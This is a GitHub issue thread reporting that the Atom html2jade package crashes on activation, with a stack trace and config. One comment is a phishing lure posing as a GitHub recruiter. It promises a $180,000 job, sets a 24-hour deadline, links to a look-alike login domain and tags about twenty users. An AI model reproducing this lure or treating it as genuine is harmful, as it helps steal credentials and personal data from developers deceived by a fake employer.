### ISSUE TITLE
Failed to activate the html2jade package

### ISSUE THREAD

**Issue by yuzhigang33** [mirek/atom-html2jade#5]
[Enter steps to reproduce below:]

1. ...
2. ...

**Atom Version**: 0.190.0
**System**: Mac OS X 10.10.2
**Thrown From**: [html2jade](https://github.com/mirek/atom-html2jade) package, v0.7.0

### Stack Trace

Failed to activate the html2jade package

```
At Cannot read property 'command' of undefined

TypeError: Cannot read property 'command' of undefined
    at Object.module.exports.activate (/Users/yzg/.atom/packages/html2jade/lib/html2jade.coffee:8:32)
    at Package.module.exports.Package.activateNow (/Applications/Atom.app/Contents/Resources/app/src/package.js:225:19)
    at /Applications/Atom.app/Contents/Resources/app/src/package.js:206:30
    at Package.module.exports.Package.measure (/Applications/Atom.app/Contents/Resources/app/src/package.js:152:15)
    at Package.module.exports.Package.activate (/Applications/Atom.app/Contents/Resources/app/src/package.js:199:14)
    at PackageManager.module.exports.PackageManager.activatePackage (/Applications/Atom.app/Contents/Resources/app/src/package-manager.js:435:21)
    at /Applications/Atom.app/Contents/Resources/app/src/package-manager.js:419:29
    at Config.module.exports.Config.transact (/Applications/Atom.app/Contents/Resources/app/src/config.js:302:16)
    at PackageManager.module.exports.PackageManager.activatePackages (/Applications/Atom.app/Contents/Resources/app/src/package-manager.js:414:19)
    at PackageManager.module.exports.PackageManager.activate (/Applications/Atom.app/Contents/Resources/app/src/package-manager.js:395:46)
```

### Commands

```
```

### Config

```json
{
  "core": {
    "ignoredNames": [
      ".git"
    ],
    "disabledPackages": [
      "autocomplete"
    ]
  }
}
```

### Installed Packages

```coffee
# User
Sublime-Style-Column-Selection, v1.2.3
autocomplete-plus, v2.9.0
cut-line, v0.10.0
highlight-selected, v0.9.1
html2jade, v0.7.0
language-jade, v0.3.0

# Dev
No dev packages
```

**Comment by melitta** [comment]
+1

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
GideonFr, @Chiuuu0209, @jonyzhang2023, @songw, @thowell, @atsuhiro, @farzaaaan, @intrinsicvardhan, @vahbuna, @hornbillw, @chenyao36, @LaxmanSinghTomar, @AmeerArsala, @kevzos, @narek-am, @themichaelusa, @joaorafaelm, @coffice12, @PatrickJS, @jekahamster
